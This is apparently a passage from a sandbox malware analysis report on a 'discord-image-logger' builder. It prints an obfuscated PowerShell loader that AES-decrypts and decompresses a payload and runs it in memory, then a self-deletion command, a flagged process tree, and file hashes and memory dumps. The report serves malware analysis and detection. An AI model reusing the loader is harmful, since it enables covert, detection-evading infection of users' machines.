'')('x//PQ4u8mfYZiPHe2OGfrd00QBKiDvcEzPaDrYozv8uYedand6uL0wzlN+5O+AFhCoQAKBv651U3V0221QDxAvpv3KCyoJoReYXVHf6P7M/KyX5+2eOQjYEjFwTGbUjMLAybGiiaRNU03vlqAT7agKum7o1H6WfH+N764uOSYGL3HIdf7WKB0TMZlcqkVcZ4EbttcZsQjZV1vkCPbJt39bdJJTOLlHC5/EHgOLRlT+W3G+02exnNVSpXP20jdKzqezuTgmjWtvyJkL9/lFJG3FHUGehTiuT3ar2yFCKi4/OkHCw1z1DGbDJvEtWfauUaRRol3S/UgNocMBrJOXX+Aw0PMubGj40DP02/Mw4JY8R/V/7YpQkEP43UqopfbI11ciWaaIn/nKzAOZ+bXBTY5L+DxT8LfXRiRGkrI1/LwcQ=');$zmDYn = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($zmDYn, 0, $zmDYn.Length);$zmDYn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($zmDYn);$nTpTd = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('NW2EL3qe/ZOARS0s/ML1EA==');$nTpTd = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($nTpTd, 0, $nTpTd.Length);$nTpTd = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($nTpTd);$snbQC = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2AgSI40erquiJx027xjhrA==');$snbQC = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($snbQC, 0, $snbQC.Length);$snbQC = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($snbQC);$qxpKv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2iK7UtzUwrolEWaIcQUhnQ==');$qxpKv = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($qxpKv, 0, $qxpKv.Length);$qxpKv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($qxpKv);$AJQNv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KrSM+woEOB3Vezss7LVo2Q==');$AJQNv = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AJQNv, 0, $AJQNv.Length);$AJQNv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AJQNv);$AfXGh = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7Wjsjcy3SC8ri3a9Bw4QkA==');$AfXGh = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($AfXGh, 0, $AfXGh.Length);$AfXGh = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($AfXGh);$GCidc0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zah5Ks6KFV7nxV/Lj1cbNA==');$GCidc0 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc0, 0, $GCidc0.Length);$GCidc0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc0);$GCidc1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('3d2GFulV4IACfF1Solw09Q==');$GCidc1 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc1, 0, $GCidc1.Length);$GCidc1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc1);$GCidc2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dmoVWHHHBRJhscv9vH7d+Q==');$GCidc2 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc2, 0, $GCidc2.Length);$GCidc2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc2);$GCidc3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Yy1MO8gEwf8dMKODGTzF5g==');$GCidc3 = $PwPCN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($GCidc3, 0, $GCidc3.Length);$GCidc3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($GCidc3);$PwPCN.Dispose();$UaEuB1.Dispose();if (@(get-process -ea silentlycontinue $GCidc3).count -gt 1) {exit};$UtsnC = [Microsoft.Win32.Registry]::$AJQNv.$qxpKv($GCidc).$snbQC($hbuWR);$VFMJc=[string[]]$UtsnC.Split('\');$rhtBQ=XNrXq(OONaJ([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VFMJc[1])));LWfQc $rhtBQ (,[string[]] ('%*', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));$NvzQg = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VFMJc[0]);$UaEuB = New-Object System.Security.Cryptography.AesManaged;$UaEuB.Mode = [System.Security.Cryptography.CipherMode]::CBC;$UaEuB.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$UaEuB.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tpmLSLfO82GY8X9Uk5Rdcs14/nfUtYA6Sn+ueOLgpTk=');$UaEuB.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MtyvC8ZzBF30QNLH3U5QaQ==');$hVJMW = $UaEuB.('rotpyrceDetaerC'[-1..-15] -join '')();$NvzQg = $hVJMW.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($NvzQg, 0, $NvzQg.Length);$hVJMW.Dispose();$UaEuB.Dispose();$JuLib = New-Object System.IO.MemoryStream(, $NvzQg);$yWMQI = New-Object System.IO.MemoryStream;$ovPeB = New-Object System.IO.Compression.GZipStream($JuLib, [IO.Compression.CompressionMode]::$GCidc1);$ovPeB.$AfXGh($yWMQI);$ovPeB.Dispose();$JuLib.Dispose();$yWMQI.Dispose();$NvzQg = $yWMQI.ToArray();$fcYPL = $zmDYn | IEX;$ABDeF = $fcYPL::$GCidc2($NvzQg);$WyGRR = $ABDeF.EntryPoint;$WyGRR.$GCidc0($null, (, [string[]] ($ZzVHZ)))
                                                                                                5⤵
                                                                                                • Executes dropped EXE
                                                                                                • Hide Artifacts: Hidden Window
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:1628
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-main\builder.bat.exe" & ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-main\builder.bat.exe" & del /f "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-main\builder.bat.exe"
                                                                                              4⤵
                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                              PID:5480
                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                5⤵
                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                PID:5496
                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                PING localhost -n 8
                                                                                                5⤵
                                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                • Runs ping.exe
                                                                                                PID:5600
                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                taskkill /F /IM "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-main\builder.bat.exe"
                                                                                                5⤵
                                                                                                • Kills process with taskkill
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:5728
                                                                                              • C:\Windows\system32\attrib.exe
                                                                                                ATTRIB -h -s "C:\Users\Admin\AppData\Local\Temp\discord-image-logger-main\builder.bat.exe"
                                                                                                5⤵
                                                                                                • Views/modifies file attributes
                                                                                                PID:5812
                                                                                      • C:\Windows\system32\svchost.exe
                                                                                        C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                        1⤵
                                                                                          PID:3568
                                                                                        • C:\Windows\system32\DllHost.exe
                                                                                          C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                          1⤵
                                                                                            PID:3748
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                            • Suspicious use of UnmapMainImage
                                                                                            PID:3904
                                                                                          • C:\Windows\System32\RuntimeBroker.exe
                                                                                            C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                            1⤵
                                                                                            • Suspicious use of UnmapMainImage
                                                                                            PID:3928
                                                                                          • C:\Windows\System32\svchost.exe
                                                                                            C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                            1⤵
                                                                                              PID:4820
                                                                                            • C:\Windows\System32\svchost.exe
                                                                                              C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                                                                                              1⤵
                                                                                                PID:4592
                                                                                              • C:\Windows\system32\svchost.exe
                                                                                                C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
                                                                                                1⤵
                                                                                                  PID:5000
                                                                                                • C:\Windows\system32\svchost.exe
                                                                                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                                                                                  1⤵
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:4172
                                                                                                • C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
                                                                                                  "C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
                                                                                                  1⤵
                                                                                                  • Drops file in System32 directory
                                                                                                  • Modifies data under HKEY_USERS
                                                                                                  PID:1636
                                                                                                • C:\Windows\system32\SppExtComObj.exe
                                                                                                  C:\Windows\system32\SppExtComObj.exe -Embedding
                                                                                                  1⤵
                                                                                                    PID:3364
                                                                                                  • C:\Windows\System32\svchost.exe
                                                                                                    C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                                                                                    1⤵
                                                                                                      PID:2384
                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                      1⤵
                                                                                                        PID:3604
                                                                                                      • C:\Windows\system32\DllHost.exe
                                                                                                        C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                        1⤵
                                                                                                          PID:1124
                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                          C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                                                                                                          1⤵
                                                                                                            PID:372
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
                                                                                                            1⤵
                                                                                                              PID:3496
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
                                                                                                              1⤵
                                                                                                                PID:3948
                                                                                                              • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                1⤵
                                                                                                                  PID:840
                                                                                                                • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                  C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:432
                                                                                                                  • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                    C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                    1⤵
                                                                                                                      PID:464

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_epcm4cmd.trf.ps1
                                                                                                                      Filesize

                                                                                                                      60B

                                                                                                                      MD5

                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                      SHA1

                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                      SHA256

                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                      SHA512

                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                      Download Submit

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\discord-image-logger-main\builder.bat.exe
                                                                                                                      Filesize

                                                                                                                      442KB

                                                                                                                      MD5

                                                                                                                      04029e121a0cfa5991749937dd22a1d9

                                                                                                                      SHA1

                                                                                                                      f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                                                                                                      SHA256

                                                                                                                      9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                                                                                                      SHA512

                                                                                                                      6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                                                                                                      Download Submit

                                                                                                                    • C:\Windows\System32\ucrtbased.dll
                                                                                                                      Filesize

                                                                                                                      1.8MB

                                                                                                                      MD5

                                                                                                                      7873612dddd9152d70d892427bc45ef0

                                                                                                                      SHA1

                                                                                                                      ab9079a43a784471ca31c4f0a34b698d99334dfa

                                                                                                                      SHA256

                                                                                                                      203d10b0deaea87d5687d362ba925289a13e52b5df55b9de58ba534290af27bf

                                                                                                                      SHA512

                                                                                                                      d988e9ff11017465b019cf3b599ef7597d2c44fc37cbee9e846dee51990ca5dc45942cc183d9d25c1dfd84f33f922c2ceead6efc1ead19e8eecb509dfb78a083

                                                                                                                      Download Submit

                                                                                                                    • C:\Windows\System32\vcruntime140_1d.dll
                                                                                                                      Filesize

                                                                                                                      52KB

                                                                                                                      MD5

                                                                                                                      9ef28981adcbf4360de5f11b8f4ecff9

                                                                                                                      SHA1

                                                                                                                      219aaa1a617b1dfa36f3928bd1020e410666134f

                                                                                                                      SHA256

                                                                                                                      8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a

                                                                                                                      SHA512

                                                                                                                      ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c

                                                                                                                      Download Submit

                                                                                                                    • C:\Windows\System32\vcruntime140d.dll
                                                                                                                      Filesize

                                                                                                                      162KB

                                                                                                                      MD5

                                                                                                                      a366d6623c14c377c682d6b5451575e6

                                                                                                                      SHA1

                                                                                                                      a8894fcfb3aa06ad073b1f581b2e749b54827971

                                                                                                                      SHA256

                                                                                                                      7ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6

                                                                                                                      SHA512

                                                                                                                      cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11

                                                                                                                      Download Submit

                                                                                                                    • memory/64-61-0x00007FFD713F0000-0x00007FFD715E5000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.0MB

                                                                                                                      Download

                                                                                                                    • memory/64-59-0x00000284207D0000-0x0000028420C2C000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.4MB

                                                                                                                      Download

                                                                                                                    • memory/64-82-0x00007FFD70890000-0x00007FFD7094E000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      760KB

                                                                                                                      Download

                                                                                                                    • memory/64-58-0x0000028420010000-0x00000284207CC000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      7.7MB

                                                                                                                      Download

                                                                                                                    • memory/64-57-0x000002841FBD0000-0x0000028420012000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4.3MB

                                                                                                                      Download

                                                                                                                    • memory/64-55-0x00007FFD713F0000-0x00007FFD715E5000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.0MB

                                                                                                                      Download

                                                                                                                    • memory/64-81-0x00007FFD713F0000-0x00007FFD715E5000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.0MB

                                                                                                                      Download

                                                                                                                    • memory/64-80-0x00000284212C0000-0x00000284212EE000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      184KB

                                                                                                                      Download

                                                                                                                    • memory/64-75-0x0000028421360000-0x000002842139C000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      240KB

                                                                                                                      Download

                                                                                                                    • memory/64-68-0x0000028421420000-0x00000284214D2000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      712KB

                                                                                                                      Download

                                                                                                                    • memory/64-69-0x0000028421B90000-0x0000028421D52000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      1.8MB

                                                                                                                      Download

                                                                                                                    • memory/64-56-0x00007FFD70890000-0x00007FFD7094E000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      760KB

                                                                                                                      Download

                                                                                                                    • memory/64-67-0x0000028421310000-0x0000028421360000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      320KB

                                                                                                                      Download

                                                                                                                    • memory/64-60-0x0000028420C30000-0x0000028420CE2000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      712KB

                                                                                                                      Download

                                                                                                                    • memory/336-109-0x00007FFD31470000-0x00007FFD31480000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                      Download

                                                                                                                    • memory/336-108-0x000001906BE30000-0x000001906BE57000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      156KB

                                                                                                                      Download

                                                                                                                    • memory/612-98-0x0000019BFE560000-0x0000019BFE581000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      132KB

                                                                                                                      Download

                                                                                                                    • memory/612-99-0x0000019BFE590000-0x0000019BFE5B7000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      156KB

                                                                                                                      Download

                                                                                                                    • memory/612-100-0x00007FFD31470000-0x00007FFD31480000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                      Download

                                                                                                                    • memory/652-30-0x00007FFD713F0000-0x00007FFD715E5000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.0MB

                                                                                                                      Download

                                                                                                                    • memory/652-23-0x00007FFD531B0000-0x00007FFD53C71000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                      Download

                                                                                                                    • memory/652-886-0x00007FFD531B0000-0x00007FFD53C71000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                      Download

                                                                                                                    • memory/652-884-0x00007FFD5E743000-0x00007FFD5E744000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      4KB

                                                                                                                      Download

                                                                                                                    • memory/652-29-0x0000024AA4DE0000-0x0000024AA4DEC000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      48KB

                                                                                                                      Download

                                                                                                                    • memory/652-28-0x0000024AC7860000-0x0000024AC78B8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      352KB

                                                                                                                      Download

                                                                                                                    • memory/652-27-0x0000024AC9760000-0x0000024AC99F8000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.6MB

                                                                                                                      Download

                                                                                                                    • memory/652-26-0x0000024AC9470000-0x0000024AC9758000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.9MB

                                                                                                                      Download

                                                                                                                    • memory/652-24-0x0000024AC83C0000-0x0000024AC9466000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      16.6MB

                                                                                                                      Download

                                                                                                                    • memory/652-6-0x00007FFD531B3000-0x00007FFD531B5000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/652-7-0x0000024ABF2D0000-0x0000024ABF2F2000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      136KB

                                                                                                                      Download

                                                                                                                    • memory/652-35-0x00007FFD531B0000-0x00007FFD53C71000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                      Download

                                                                                                                    • memory/652-22-0x00007FFD531B3000-0x00007FFD531B5000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      8KB

                                                                                                                      Download

                                                                                                                    • memory/652-20-0x00007FFD713F0000-0x00007FFD715E5000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.0MB

                                                                                                                      Download

                                                                                                                    • memory/652-17-0x00007FFD531B0000-0x00007FFD53C71000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                      Download

                                                                                                                    • memory/652-18-0x00007FFD531B0000-0x00007FFD53C71000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                      Download

                                                                                                                    • memory/652-21-0x00007FFD70890000-0x00007FFD7094E000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      760KB

                                                                                                                      Download

                                                                                                                    • memory/652-19-0x0000024AA4DB0000-0x0000024AA4DDC000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      176KB

                                                                                                                      Download

                                                                                                                    • memory/672-104-0x00007FFD31470000-0x00007FFD31480000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                      Download

                                                                                                                    • memory/672-103-0x000001E98ED40000-0x000001E98ED67000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      156KB

                                                                                                                      Download

                                                                                                                    • memory/740-116-0x00007FFD31470000-0x00007FFD31480000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                      Download

                                                                                                                    • memory/740-115-0x0000017AB1120000-0x0000017AB1147000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      156KB

                                                                                                                      Download

                                                                                                                    • memory/920-124-0x00007FFD31470000-0x00007FFD31480000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                      Download

                                                                                                                    • memory/920-123-0x000001C6852C0000-0x000001C6852E7000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      156KB

                                                                                                                      Download

                                                                                                                    • memory/952-111-0x0000016066FA0000-0x0000016066FC7000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      156KB

                                                                                                                      Download

                                                                                                                    • memory/952-112-0x00007FFD31470000-0x00007FFD31480000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                      Download

                                                                                                                    • memory/1056-127-0x00007FFD31470000-0x00007FFD31480000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                      Download

                                                                                                                    • memory/1056-126-0x0000020279560000-0x0000020279587000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      156KB

                                                                                                                      Download

                                                                                                                    • memory/1076-129-0x000001A475390000-0x000001A4753B7000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      156KB

                                                                                                                      Download

                                                                                                                    • memory/1076-130-0x00007FFD31470000-0x00007FFD31480000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                      Download

                                                                                                                    • memory/1172-132-0x000002544E380000-0x000002544E3A7000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      156KB

                                                                                                                      Download

                                                                                                                    • memory/1172-133-0x00007FFD31470000-0x00007FFD31480000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                      Download

                                                                                                                    • memory/1232-136-0x00007FFD31470000-0x00007FFD31480000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                      Download

                                                                                                                    • memory/1232-135-0x00000220C09A0000-0x00000220C09C7000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      156KB

                                                                                                                      Download

                                                                                                                    • memory/3164-34-0x0000000140000000-0x0000000140004000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      16KB

                                                                                                                      Download

                                                                                                                    • memory/3164-32-0x0000000140000000-0x0000000140004000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      16KB

                                                                                                                      Download

                                                                                                                    • memory/4128-85-0x00007FFD713F0000-0x00007FFD715E5000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      2.0MB

                                                                                                                      Download

                                                                                                                    • memory/4128-86-0x00007FFD70890000-0x00007FFD7094E000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      760KB

                                                                                                                      Download

                                                                                                                    • memory/4128-84-0x0000000140000000-0x0000000140028000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      160KB

                                                                                                                      Download

                                                                                                                    • memory/4128-83-0x0000000140000000-0x0000000140028000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      160KB

                                                                                                                      Download

                                                                                                                    • memory/4128-96-0x0000000140000000-0x0000000140028000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      160KB

                                                                                                                      Download